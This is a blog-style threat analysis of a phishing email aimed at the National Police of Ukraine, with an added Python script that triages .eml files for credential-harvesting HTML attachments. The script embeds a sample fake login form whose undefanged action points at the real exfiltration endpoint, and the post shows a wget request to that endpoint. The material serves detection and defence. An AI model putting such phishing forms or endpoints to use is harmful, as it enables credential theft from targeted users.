According to an .eml file uploaded to VirusTotal today, unknown actors attempted a targeted phishing attack on the National Police of Ukraine.
The email (MD5: bec01fe3b14b3da507a6a4c5c698e8ed) was sent to firstname.lastname@example.org a week ago, with the fake login page attached as an HTML file (MD5: 5dca48afe347db9e9f9cab9c824c122d).
Let us take a closer look at how the attackers tried to carry out this targeted attack.
The sender's mailbox is in the 'kelantan.gov.my' domain, which belongs to the official web portal of the Kelantan state of Malaysia. Either that mailbox was compromised or the sender information was spoofed by the attacker.
The message carries an attachment named 'Zimbra_Webmail_Activation.html', which contains a fake Zimbra login page.
“Zimbra provides open source server and client software for messaging and collaboration. To find out more visit http://www.zimbra.com.”
Once entered, the login and password would have been submitted to hxxp://apliflex.pl/blue-zimbra.php.
The attackers had presumably compromised this poorly secured website beforehand and planted a script there to forward the submitted credentials to themselves.
At the time of writing, the script had already been removed; requesting it only returns a redirect:

wget hxxp://apliflex.pl/blue-zimbra.php
Resolving apliflex.pl (apliflex.pl)... 126.96.36.199
Connecting to apliflex.pl (apliflex.pl)|188.8.131.52|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily

We couldn't trace and attribute this attack to any party.
This example shows once again that social engineering can take over a target more effectively than, for example, expensive exploits, which mostly depend on outdated software being installed on the victim's computer and can be easily blocked by antivirus products.
To resist this kind of targeted attack, quarantine all email attachments from suspicious senders and analyze them later in a sandbox (e.g. http://nas.nioguard.com/). Attackers typically use the following extensions for attached files: html, js, wsf, doc, docx, pdf, png, jpg, scr, exe, com, zip, rar. Beware of unpacking or opening files of these types received from unknown senders.
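The following script is an added example, not code from the original post or from NioGuard: it triages an .eml for exactly the pattern described above (an attachment with a risky extension that carries a login form posting credentials to an external host) and performs the quarantine check the post recommends. The message it parses is constructed in memory for the demo: the attachment name and the form action (apliflex.pl/blue-zimbra.php) are the indicators named in the post, while the sender address, the Return-Path, the recipient, the subject and the page markup are assumptions made up for the example. The Return-Path/From comparison is a generic spoofing heuristic and is not something the post claims to have done.

```python
"""Triage an .eml for an HTML attachment carrying a credential-phishing form.

Added example (not the original post's code). The sample message below is
constructed for the demo; only the attachment filename and the form action
URL come from the post's indicators.
"""
import hashlib
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attachment extensions the post lists as typical for these campaigns.
RISKY_EXTENSIONS = {"html", "js", "wsf", "doc", "docx", "pdf", "png", "jpg",
                    "scr", "exe", "com", "zip", "rar"}

# Constructed fake login page. The markup is made up; the action URL is the
# exfiltration endpoint named in the post (written undefanged so it parses).
SAMPLE_HTML = b"""<html><body>
<form method="post" action="http://apliflex.pl/blue-zimbra.php">
  <input name="username" type="text">
  <input name="password" type="password">
  <input type="submit" value="Sign In">
</form></body></html>
"""


class FormScanner(HTMLParser):
    """Collect <form action> targets and count password inputs in an HTML blob."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.password_fields = 0

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and attrs.get("action"):
            self.actions.append(attrs["action"])
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_fields += 1


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def defang(url: str) -> str:
    """Neutralise a URL for reporting (http -> hxxp), as the post does."""
    return "hxxp" + url[4:] if url.lower().startswith("http") else url


def build_sample_eml() -> bytes:
    """Constructed message mimicking the one described in the post."""
    msg = EmailMessage()
    msg["From"] = "webmaster@kelantan.gov.my"          # assumed; post only gives the domain
    msg["Return-Path"] = "<bounce@mail.example.net>"   # assumed; mismatch hints at spoofing
    msg["To"] = "recipient@example.org"                # assumed
    msg["Subject"] = "Zimbra Webmail Activation"       # assumed
    msg.set_content("Your mailbox requires activation. Open the attached page.")
    msg.add_attachment(SAMPLE_HTML, maintype="text", subtype="html",
                       filename="Zimbra_Webmail_Activation.html")
    return msg.as_bytes()


def triage_eml(raw: bytes) -> dict:
    """Return sender/envelope checks plus one finding per attachment."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    from_domain = parseaddr(str(msg.get("From", "")))[1].rpartition("@")[2].lower()
    rp_domain = parseaddr(str(msg.get("Return-Path", "")))[1].rpartition("@")[2].lower()
    report = {
        "from_domain": from_domain,
        # Envelope sender domain differing from the From domain is a spoofing hint.
        "envelope_mismatch": bool(rp_domain) and rp_domain != from_domain,
        "attachments": [],
    }
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        ext = name.rpartition(".")[2].lower()
        finding = {"filename": name, "md5": md5_hex(data),
                   "quarantine": ext in RISKY_EXTENSIONS,
                   "post_targets": [], "credential_form": False}
        if ext in ("html", "htm"):
            scanner = FormScanner()
            scanner.feed(data.decode("utf-8", "replace"))
            # Only forms that post to an absolute external host are exfiltration candidates.
            targets = [a for a in scanner.actions if urlparse(a).netloc]
            finding["post_targets"] = [defang(a) for a in targets]
            finding["credential_form"] = scanner.password_fields > 0 and bool(targets)
        report["attachments"].append(finding)
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage_eml(build_sample_eml()), indent=2))
```

Run it against a real .eml by replacing build_sample_eml() with the file's bytes; any attachment flagged both quarantine and credential_form, with a post_target on a host unrelated to the sender, is the case the post describes and should go to the sandbox rather than to the user.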